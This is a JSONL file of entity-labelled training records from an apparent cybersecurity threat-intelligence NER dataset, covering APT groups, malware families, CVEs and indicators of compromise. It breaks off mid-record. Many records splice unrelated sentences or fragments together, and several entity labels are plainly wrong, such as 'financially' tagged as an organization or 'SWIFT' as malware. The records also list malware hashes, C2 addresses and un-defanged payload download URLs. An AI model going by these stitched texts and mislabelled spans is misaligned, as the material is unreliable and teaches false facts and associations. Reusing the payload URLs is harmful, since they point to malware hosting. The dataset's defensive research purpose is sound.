{"text": "Interestingly , the artifact bundles a copy of OpenSSL 1.0.1e , from February 2013 , which causes the unusually large size of the binary .", "spans": {"TOOL: OpenSSL": [[47, 54]]}, "info": {"id": "cyberner_stix_train_003557", "source": "cyberner_stix_train"}}
{"text": "APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week – but it wouldn't confirm the other details in Resecurity 's post , including the attribution .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: military": [[24, 32]], "ORGANIZATION: diplomatic": [[35, 45]], "ORGANIZATION: government": [[50, 60]], "ORGANIZATION: media": [[63, 68]], "ORGANIZATION: energy": [[71, 77]], "ORGANIZATION: engineering": [[80, 91]], "ORGANIZATION: business services": [[94, 111]], "ORGANIZATION: telecommunications sectors": [[116, 142]], "ORGANIZATION: Citrix": [[173, 179]], "ORGANIZATION: Resecurity": [[327, 337]]}, "info": {"id": "cyberner_stix_train_003558", "source": "cyberner_stix_train"}}
{"text": "'' We determined that the \" eCommon '' file contains support code and structures that are platform independent . We observed another campaign targeting an organisation located in Lebanon . The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"THREAT_ACTOR: Elfin group": [[193, 204]], "THREAT_ACTOR: APT33": [[211, 216]]}, "info": {"id": "cyberner_stix_train_003559", "source": "cyberner_stix_train"}}
{"text": "Powerview.ps1 — This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework .", "spans": {"FILEPATH: Powerview.ps1": [[0, 13]], "TOOL: PowerShell-based": [[21, 37]], "TOOL: PowerSploit": [[87, 98]]}, "info": {"id": "cyberner_stix_train_003560", "source": "cyberner_stix_train"}}
{"text": "We suspect the updated PIN is sent to the C2 , most likely to give the malware the option to perform privileged activities on the infected device related to payments , system configuration options , etc . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the attacker controlled server jquerycodedownload.live/check.aspx” . CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": {"MALWARE: JavaScript": [[209, 219]], "ORGANIZATION: CTU": [[434, 437]], "THREAT_ACTOR: Mia Ash": [[612, 619]]}, "info": {"id": "cyberner_stix_train_003561", "source": "cyberner_stix_train"}}
{"text": "Version # 3 : Sept. - Dec. 2019 — Domain : ponethus [ . one organization is located in the US . Following the release of the article , FireEye observed a distinct change in RIPTIDE ’s protocols and strings . PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": {"ORGANIZATION: FireEye": [[135, 142]], "MALWARE: RIPTIDE": [[173, 180]], "MALWARE: PingPull": [[208, 216]], "SYSTEM: HTTPS": [[225, 230]], "SYSTEM: C2.[28": [[250, 256]]}, "info": {"id": "cyberner_stix_train_003562", "source": "cyberner_stix_train"}}
{"text": "Also , we found a debug version of the implant ( 70a937b2504b3ad6c623581424c7e53d ) that contains interesting constants , including the version of the spyware . Its attack activities can be traced back to April 2012 . Axiom is a cyber espionage group suspected to be associated with the Chinese government .", "spans": {"THREAT_ACTOR: Axiom": [[218, 223]]}, "info": {"id": "cyberner_stix_train_003563", "source": "cyberner_stix_train"}}
{"text": "Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . The codename for Turla APT group in this presentation is MAKERSMARK .", "spans": {"THREAT_ACTOR: APT12": [[31, 36]], "TOOL: HIGHTIDE": [[65, 73]], "TOOL: Microsoft Word": [[82, 96]], "TOOL: .doc": [[99, 103]], "VULNERABILITY: CVE-2012-0158": [[129, 142]], "THREAT_ACTOR: Turla APT group": [[162, 177]]}, "info": {"id": "cyberner_stix_train_003564", "source": "cyberner_stix_train"}}
{"text": "Port 6211 : Calendar extraction service . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . Criticism of and embarrassing content about Hamas . This includes tens of thousands of terminals outside of Ukraine that , among other things , support wind turbines and provide Internet services to private citizens .", "spans": {"SYSTEM: Calendar": [[12, 20]], "MALWARE: malicious files": [[82, 97]], "TOOL: iviewers.dll file": [[129, 146]], "TOOL: DLL load hijacking": [[160, 178]]}, "info": {"id": "cyberner_stix_train_003565", "source": "cyberner_stix_train"}}
{"text": "The first versions of the new AZZY implant appeared in August of this year .", "spans": {"MALWARE: AZZY": [[30, 34]]}, "info": {"id": "cyberner_stix_train_003566", "source": "cyberner_stix_train"}}
{"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . If the macros in SPK KANUN DEĞİŞİKLİĞİ GİB GÖRÜŞÜ.doc” are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe” .", "spans": {"MALWARE: configuration file": [[4, 22]], "FILEPATH: SPK KANUN": [[131, 140]], "FILEPATH: CiscoAny.exe”": [[265, 278]]}, "info": {"id": "cyberner_stix_train_003567", "source": "cyberner_stix_train"}}
{"text": "Most recently they were connected to a campaign in March that targeted ” organizations in Turkey , Pakistan , and Tajikistan .", "spans": {}, "info": {"id": "cyberner_stix_train_003568", "source": "cyberner_stix_train"}}
{"text": "Mobile Banking com.IngDirectAndroid ING com.instagram.android Instagram com.konylabs.capitalone Capital One® Mobile com.mail.mobile.android.mail mail.com mail com.microsoft.office.outlook Microsoft Outlook com.snapchat.android Snapchat com.tencent.mm WeChat com.twitter.android Twitter com.ubercab Uber com.usaa.mobile.android.usaa USAA Mobile com.usbank.mobilebanking U.S. Bank - Inspired by customers com.viber.voip Viber com.wf.wellsfargomobile SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea’s media , manufacturing and universities , around February and March 2019 . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts .", "spans": {"SYSTEM: Capital One® Mobile": [[96, 115]], "SYSTEM: mail": [[154, 158]], "SYSTEM: Microsoft Outlook": [[188, 205]], "SYSTEM: Snapchat": [[227, 235]], "SYSTEM: WeChat": [[251, 257]], "SYSTEM: Twitter": [[278, 285]], "ORGANIZATION: Uber": [[298, 302]], "SYSTEM: USAA Mobile": [[332, 343]], "SYSTEM: Viber": [[418, 423]], "THREAT_ACTOR: SectorJ04": [[448, 457]], "ORGANIZATION: media": [[550, 555]], "ORGANIZATION: manufacturing": [[558, 571]], "ORGANIZATION: universities": [[576, 588]], "THREAT_ACTOR: attackers": [[644, 653]], "MALWARE: Worldwide Interbank Financial Telecommunication": [[675, 722]], "MALWARE: SWIFT": [[725, 730]]}, "info": {"id": "cyberner_stix_train_003569", "source": "cyberner_stix_train"}}
{"text": "In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access .", "spans": {"TOOL: KeyBoy": [[144, 150]], "TOOL: string obfuscation routine": [[165, 191]], "ORGANIZATION: CTU": [[269, 272]]}, "info": {"id": "cyberner_stix_train_003570", "source": "cyberner_stix_train"}}
{"text": "] net svcws [ . These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus . But we also attempt to figure out why the adversary changed — what broke? — so that we can predict if and when they will change again in the future . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"THREAT_ACTOR: ransomware gangs": [[372, 388]]}, "info": {"id": "cyberner_stix_train_003571", "source": "cyberner_stix_train"}}
{"text": "These botnets generally target the following regions :", "spans": {}, "info": {"id": "cyberner_stix_train_003572", "source": "cyberner_stix_train"}}
{"text": "Gooligan , a family of Android malware that came to light in November after it compromised more than 1 million Google accounts , contained similar abilities to tamper with Google Play ratings . Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure . Quasar RAT ( Trojan.Quasar ) : Commodity RAT that can be used to steal passwords and execute commands on an infected computer . The way Hack520 signs his messages in one hacker forum provides a clue pointing to this connection .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android": [[23, 30]], "ORGANIZATION: Google": [[111, 117]], "SYSTEM: Google Play": [[172, 183]], "THREAT_ACTOR: Lazarus Group": [[277, 290], [429, 442]], "MALWARE: Quasar RAT": [[475, 485]], "MALWARE: Trojan.Quasar": [[488, 501]], "ORGANIZATION: Hack520": [[611, 618]]}, "info": {"id": "cyberner_stix_train_003573", "source": "cyberner_stix_train"}}
{"text": "Finally , Mandiant’s Devon Kerr and John Miller of FireEye iSIGHT Intelligence will expose the tactics of FIN7 , a financially motivated hacker group that FireEye tracked throughout 2016 . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"ORGANIZATION: Mandiant’s": [[10, 20]], "ORGANIZATION: FireEye": [[51, 58], [155, 162]], "THREAT_ACTOR: FIN7": [[106, 110]], "ORGANIZATION: financially": [[115, 126]], "THREAT_ACTOR: Clever Kitten": [[189, 202]], "ORGANIZATION: individual": [[368, 378]], "ORGANIZATION: social engineering": [[412, 430]]}, "info": {"id": "cyberner_stix_train_003574", "source": "cyberner_stix_train"}}
{"text": "Microsoft application whitelisting solution AppLocker prevents unknown executables from running on a system .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "TOOL: application whitelisting solution": [[10, 43]], "TOOL: AppLocker": [[44, 53]]}, "info": {"id": "cyberner_stix_train_003575", "source": "cyberner_stix_train"}}
{"text": "any additional APKs are downloaded to external storage . Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems . It has compromised a wide range of targets , including governments along with organizations in the research , chemical , engineering , manufacturing , consulting , finance , telecoms , and several other sectors . NuisanceDestruction intrinsic There are some that are intrinsically motivated to simply attack an organization or person for no other reason than to create chaos and destruction .", "spans": {"ORGANIZATION: media": [[108, 113]], "THREAT_ACTOR: attackers": [[177, 186]], "THREAT_ACTOR: Lazarus": [[216, 223], [294, 301]], "ORGANIZATION: banks": [[350, 355]], "ORGANIZATION: governments": [[423, 434]]}, "info": {"id": "cyberner_stix_train_003576", "source": "cyberner_stix_train"}}
{"text": "Carefully consider the risks before granting administrative rights to users on their own machines .", "spans": {}, "info": {"id": "cyberner_stix_train_003577", "source": "cyberner_stix_train"}}
{"text": "Lets start by giving a summary about the muddyc3 tool :", "spans": {"TOOL: muddyc3": [[41, 48]]}, "info": {"id": "cyberner_stix_train_003578", "source": "cyberner_stix_train"}}
{"text": "] 137 54.69.156 [ . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology . The threat actor behind the attack invested considerable time and effort to lure their victims with specially-crafted documents that target Palestinian individuals and entities in the Middle East . None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": {"ORGANIZATION: FireEye": [[261, 268]], "ORGANIZATION: Dragos'": [[273, 280]], "TOOL: TRITON": [[314, 320]], "TOOL: PIEHOP": [[694, 700]]}, "info": {"id": "cyberner_stix_train_003579", "source": "cyberner_stix_train"}}
{"text": "The following month , we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples . According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"TOOL: installer": [[407, 416]], "ORGANIZATION: Malwarebytes": [[507, 519]]}, "info": {"id": "cyberner_stix_train_003580", "source": "cyberner_stix_train"}}
{"text": "] com on port 22011 . In 2015 , Suckfly conducted a multistage attack . Directory of Government Services.pdf : Tracked by Mandiant as FREEFIRE , it is a lightweight backdoor written for .NET .", "spans": {"FILEPATH: Directory of Government Services.pdf": [[72, 108]], "MALWARE: FREEFIRE": [[134, 142]]}, "info": {"id": "cyberner_stix_train_003581", "source": "cyberner_stix_train"}}
{"text": "First , the attacker’s mission is to disrupt an operational process rather than steal data . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"THREAT_ACTOR: attacker’s": [[12, 22]], "ORGANIZATION: McAfee Advanced Threat Research": [[97, 128]], "FILEPATH: data-gathering implant": [[166, 188]]}, "info": {"id": "cyberner_stix_train_003582", "source": "cyberner_stix_train"}}
{"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . APT33 : 91.235.142.76 mywinnetwork.ddns.net . It supports loading arbitrary .NET assemblies encoded as Base64 sent to it via chat comments .", "spans": {"ORGANIZATION: US-CERT Code Analysis Team": [[119, 145]], "MALWARE: botnet controller": [[155, 172]], "THREAT_ACTOR: APT33": [[189, 194]], "IP_ADDRESS: 91.235.142.76": [[197, 210]], "DOMAIN: mywinnetwork.ddns.net": [[211, 232]]}, "info": {"id": "cyberner_stix_train_003583", "source": "cyberner_stix_train"}}
{"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . Political entities in Central Asia have been targeted throughout 2018 by different actors , including IndigoZebra , Sofacy ( with Zebrocy malware ) and most recently by DustSquad ( with Octopus malware ) .", "spans": {"ORGANIZATION: Indian Army": [[124, 135]], "ORGANIZATION: Political entities": [[207, 225]], "THREAT_ACTOR: IndigoZebra": [[309, 320]], "THREAT_ACTOR: Sofacy": [[323, 329]], "MALWARE: Zebrocy": [[337, 344]], "MALWARE: malware": [[345, 352], [401, 408]], "MALWARE: Octopus": [[393, 400]]}, "info": {"id": "cyberner_stix_train_003584", "source": "cyberner_stix_train"}}
{"text": "Answer from the C2 The C2 will check the country field , if it 's empty or if the country is not targeted , it will reply with a \" Unauthorized '' answer . Most targets are from the Middle East : Israel , Egypt , Saudi Arabia , United Arab Emirates and Iraq . DUDELL : File Name :E quipment Purchase List 2018-2020 (Final ).xls . p - macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7", "spans": {"MALWARE: DUDELL": [[260, 266]], "FILEPATH: :E quipment Purchase List 2018-2020 (Final ).xls": [[279, 327]], "MALWARE: p - macos-55554944c2a6eb29a7bc3c73acdaa3e0a7a8d8c7": [[330, 380]]}, "info": {"id": "cyberner_stix_train_003585", "source": "cyberner_stix_train"}}
{"text": "The server can use this information to determine if the user ’ s carrier is one of Bread ’ s targets . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"MALWARE: Bread": [[83, 88]], "THREAT_ACTOR: Bahamut": [[176, 183]], "MALWARE: Devoted To Humanity": [[199, 218]], "MALWARE: ZxShell": [[360, 367]], "ORGANIZATION: Talos researchers": [[442, 459]], "TOOL: Open Babel": [[508, 518]]}, "info": {"id": "cyberner_stix_train_003586", "source": "cyberner_stix_train"}}
{"text": "Like HammerDuke , SeaDuke appears to be used by the Dukes group primarily as a secondary backdoor left on CozyDuke victims after that toolset has completed the initial infection and stolen any readily available information from them .", "spans": {"MALWARE: HammerDuke": [[5, 15]], "MALWARE: SeaDuke": [[18, 25]], "THREAT_ACTOR: Dukes": [[52, 57]], "MALWARE: CozyDuke": [[106, 114]]}, "info": {"id": "cyberner_stix_train_003587", "source": "cyberner_stix_train"}}
{"text": "To be more specific , the malware uninstalls cloud security products by Alibaba Cloud and Tencent Cloud . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": {"TOOL: Flash": [[117, 122]], "VULNERABILITY: exploits": [[123, 131]], "TOOL: Java": [[201, 205]], "VULNERABILITY: zero-day": [[206, 214]], "ORGANIZATION: Kaspersky Lab": [[274, 287]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[300, 328]]}, "info": {"id": "cyberner_stix_train_003588", "source": "cyberner_stix_train"}}
{"text": "Nevertheless , users should practice proper security hygiene to mitigate threats that may take advantage of a home or business router ’ s security gaps . It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . Dropurl : kentona[.su – 47.245.58.124 https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe C2: 217[.12.201.159 TA505 : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 TA505 : 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b TA505 : fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 TA505 : c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a TA505 : 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 .", "spans": {"THREAT_ACTOR: attackers": [[190, 199]], "TOOL: scripts": [[205, 212]], "DOMAIN: kentona[.su": [[311, 322]], "IP_ADDRESS: 47.245.58.124": [[325, 338]], "URL: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe": [[339, 402]], "URL: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe": [[403, 466]], "DOMAIN: 217[.12.201.159": [[471, 486]], "THREAT_ACTOR: TA505": [[487, 492], [562, 567], [635, 640], [708, 713], [781, 786]], "FILEPATH: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325": [[495, 561]], "FILEPATH: 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b": [[570, 634]], "FILEPATH: fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0": [[643, 707]], "FILEPATH: c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a": [[716, 780]], "FILEPATH: 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3": [[789, 853]]}, "info": {"id": "cyberner_stix_train_003589", "source": "cyberner_stix_train"}}
{"text": "Italian ( Subito.apk ) and French ( Leboncoin.apk ) versions appeared shortly afterwards in January 2019 . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . Both files were stored in \"C:\\Windows\" .", "spans": {"ORGANIZATION: \bFireEye iSIGHT": [[107, 122]], "THREAT_ACTOR: APT37": [[150, 155]], "THREAT_ACTOR: Scarcruft": [[206, 215]], "THREAT_ACTOR: Group123": [[220, 228]], "FILEPATH: \"C:\\Windows\"": [[257, 269]]}, "info": {"id": "cyberner_stix_train_003590", "source": "cyberner_stix_train"}}
{"text": "Conversations-based app mimics Telegram messenger Even when we originally thought this was a backdoored version of the Conversations app , used to infect victims , we didn´t discovered anything malicious in it . When the group's focus shifted to banks , the decoy documents were related to banking system regulations or advisories from FinCERT , an organization created by the Russian government to provide help and guidance to its financial institutions . But both group seem to have different TTPs ( Tactics , Techniques and Procedures ) and it leads us to believe that one group regularly lurks in the other ’s shadow .", "spans": {"SYSTEM: Telegram messenger": [[31, 49]], "THREAT_ACTOR: group's": [[221, 228]], "ORGANIZATION: FinCERT": [[336, 343]]}, "info": {"id": "cyberner_stix_train_003591", "source": "cyberner_stix_train"}}
{"text": "Record audio using the computer ’s microphone .", "spans": {}, "info": {"id": "cyberner_stix_train_003592", "source": "cyberner_stix_train"}}
{"text": "The service is implemented in the class com.serenegiant.service.ScreenRecorderService which is declared in the package manifest . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed . Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan . Adversaries may also make changes to victim systems to abuse non - standard ports .", "spans": {"TOOL: Lamberts": [[173, 181]], "TOOL: Regin": [[217, 222]], "TOOL: ProjectSauron": [[225, 238]], "TOOL: Equation": [[241, 249]], "TOOL: Duqu2": [[254, 259]], "ORGANIZATION: PRC": [[424, 427]], "THREAT_ACTOR: Adversaries": [[464, 475]]}, "info": {"id": "cyberner_stix_train_003593", "source": "cyberner_stix_train"}}
{"text": "In aggregate , the type of information stolen could let an attacker know where a person is , with whom they are associated ( including contacts ’ profile photos ) , the messages they are sending , the websites they visit and search history , screenshots that reveal data from other apps on the device , the conversations they have in the presence of the device , and a myriad of images including anything at which device ’ s camera is pointed . The Turla group is known to be painstaking and work in stages , first doing reconnaissance on their victims' systems before deploying their most sophisticated tools such as Carbon . Each Svchost session can contain multiple shared services that are organized in groups . Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality , or without the logical preconditions to trigger their expected function .", "spans": {"TOOL: Carbon": [[618, 624]], "TOOL: Svchost": [[632, 639]]}, "info": {"id": "cyberner_stix_train_003594", "source": "cyberner_stix_train"}}
{"text": "This behavior can be detected using a tool called WinLister , which enumerates hidden windows .", "spans": {"TOOL: WinLister": [[50, 59]], "SYSTEM: windows": [[86, 93]]}, "info": {"id": "cyberner_stix_train_003595", "source": "cyberner_stix_train"}}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . In this blog post , we discussed two separate malware variations that behave in very similar ACTs and use similar techniques to acquire a C2 address , with both using Yahoo Answers and Quora to evade traditional mechanisms for blocking command and control domains .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "TOOL: C2": [[243, 245]]}, "info": {"id": "cyberner_stix_train_003596", "source": "cyberner_stix_train"}}
{"text": "The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) .", "spans": {"TOOL: banking Trojans Dridex": [[96, 118]], "TOOL: Qakbot": [[123, 129]], "THREAT_ACTOR: Pitty Tiger group": [[172, 189]], "FILEPATH: Microsoft Office Word document": [[218, 248]], "VULNERABILITY: CVE-2012-0158": [[291, 304]]}, "info": {"id": "cyberner_stix_train_003597", "source": "cyberner_stix_train"}}
{"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": {"ORGANIZATION: Symantec": [[16, 24]], "THREAT_ACTOR: Suckfly": [[45, 52]]}, "info": {"id": "cyberner_stix_train_003598", "source": "cyberner_stix_train"}}
{"text": "With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November’s Single’s Day and December’s Asian online shopping fest . In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” .", "spans": {"THREAT_ACTOR: Shun Wang": [[40, 49]], "FILEPATH: BMW_x1”": [[444, 451]], "FILEPATH: BMW_x2”": [[454, 461]], "FILEPATH: BMW_x8”": [[472, 479]]}, "info": {"id": "cyberner_stix_train_003599", "source": "cyberner_stix_train"}}
{"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": {"ORGANIZATION: Anomali": [[0, 7]], "MALWARE: ITW": [[86, 89]], "VULNERABILITY: CVE-2018-0798": [[117, 130]], "VULNERABILITY: zero-day": [[136, 144]], "VULNERABILITY: CVE-2011-3544": [[257, 270]], "VULNERABILITY: CVE-2010-0738": [[318, 331]], "ORGANIZATION: Dell SecureWorks'": [[364, 381]]}, "info": {"id": "cyberner_stix_train_003600", "source": "cyberner_stix_train"}}
{"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system . APT33 : dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2 POSHC2 backdoor . In late May , SentinelLabs observed a new Iranian statesponsored APT , which they dubbed Agrius , as conducting an extensive espionagedestruction campaign against Israeli targets since 2020 .", "spans": {"TOOL: Volgmer": [[591, 598]], "THREAT_ACTOR: HIDDEN COBRA actors": [[622, 641]], "TOOL: custom tools": [[657, 669]], "THREAT_ACTOR: APT33": [[740, 745]], "MALWARE: dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2 POSHC2 backdoor": [[748, 835]], "ORGANIZATION: SentinelLabs": [[852, 864]], "THREAT_ACTOR: APT": [[903, 906]], "THREAT_ACTOR: Agrius": [[927, 933]], "ORGANIZATION: Israeli targets": [[1001, 1016]]}, "info": {"id": "cyberner_stix_train_003601", "source": "cyberner_stix_train"}}
{"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"THREAT_ACTOR: Scattered Canary": [[95, 111]], "MALWARE: NetTraveler": [[251, 262]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2012-0158": [[284, 297]], "MALWARE: NetTraveler Trojan": [[313, 331]]}, "info": {"id": "cyberner_stix_train_003602", "source": "cyberner_stix_train"}}
{"text": "We have provided an updated version of those conclusions , a layout of the tactics that they generally employ , as well as observations of apparent tactical shifts .", "spans": {}, "info": {"id": "cyberner_stix_train_003603", "source": "cyberner_stix_train"}}
{"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"MALWARE: Microsoft Word attachment": [[80, 105]], "VULNERABILITY: CVE-2017-0199": [[138, 151]], "TOOL: ZeroT Trojan": [[166, 178]], "TOOL: PlugX Remote Access Trojan": [[210, 236]], "TOOL: RAT": [[239, 242]], "THREAT_ACTOR: APT34": [[266, 271]], "TOOL: Microsoft Office": [[286, 302]], "VULNERABILITY: CVE-2017-11882": [[317, 331]], "MALWARE: POWRUNER": [[342, 350]], "MALWARE: BONDUPDATER": [[355, 366]], "ORGANIZATION: Microsoft": [[390, 399]]}, "info": {"id": "cyberner_stix_train_003604", "source": "cyberner_stix_train"}}
{"text": "http://ditetec.com S-DOM/ts.exe http://ditetec.com S-DOM/u2.exe http://domass.com.ua S-DOM/index.gif http://firop.com S-DOM/ego.exe http://unoset.com S-DOM/jpx.exe http://unoset.com S-DOM/sxr.exe https://doci.download S-DOM/inc.exe https://farhenzel.co S-DOM/gls.exe https://farsonka.co S-DOM/trb.exe https://formsonat.co S-DOM/mrb.exe https://fortuma.co S-DOM/scu.exe https://iilliiill.bid S-DOM/6ven.exe https://iilliiill.bid S-DOM/ven.exe https://iilliiill.bid S-DOM/ven.tvv https://lom.party S-DOM/mov.exe https://naiillad.date S-DOM/ex3.exe https://naiillad.date S-DOM/u3.exe https://naiillad.date S-DOM/vmer.exe https://naiillad.date S-DOM/vsync.exe https://notepad-plus-plus.org/repository S-DOM/7.x/7.4.2/npp.7.4.2.Installer.exe https://prof.cricket S-DOM/wp.exe https://tvavi.win S-DOM/pago.exe .", "spans": {"FILEPATH: http://ditetec.com S-DOM/ts.exe": [[0, 31]], "FILEPATH: http://ditetec.com S-DOM/u2.exe": [[32, 63]], "FILEPATH: http://domass.com.ua S-DOM/index.gif": [[64, 100]], "FILEPATH: http://firop.com S-DOM/ego.exe": [[101, 131]], "FILEPATH: http://unoset.com S-DOM/jpx.exe": [[132, 163]], "FILEPATH: http://unoset.com S-DOM/sxr.exe": [[164, 195]], "FILEPATH: https://doci.download S-DOM/inc.exe": [[196, 231]], "FILEPATH: https://farhenzel.co S-DOM/gls.exe": [[232, 266]], "FILEPATH: https://farsonka.co S-DOM/trb.exe": [[267, 300]], "FILEPATH: https://formsonat.co S-DOM/mrb.exe": [[301, 335]], "FILEPATH: https://fortuma.co S-DOM/scu.exe": [[336, 368]], "FILEPATH: https://iilliiill.bid S-DOM/6ven.exe": [[369, 405]], "FILEPATH: https://iilliiill.bid S-DOM/ven.exe": [[406, 441]], "FILEPATH: https://iilliiill.bid S-DOM/ven.tvv": [[442, 477]], "FILEPATH: https://lom.party 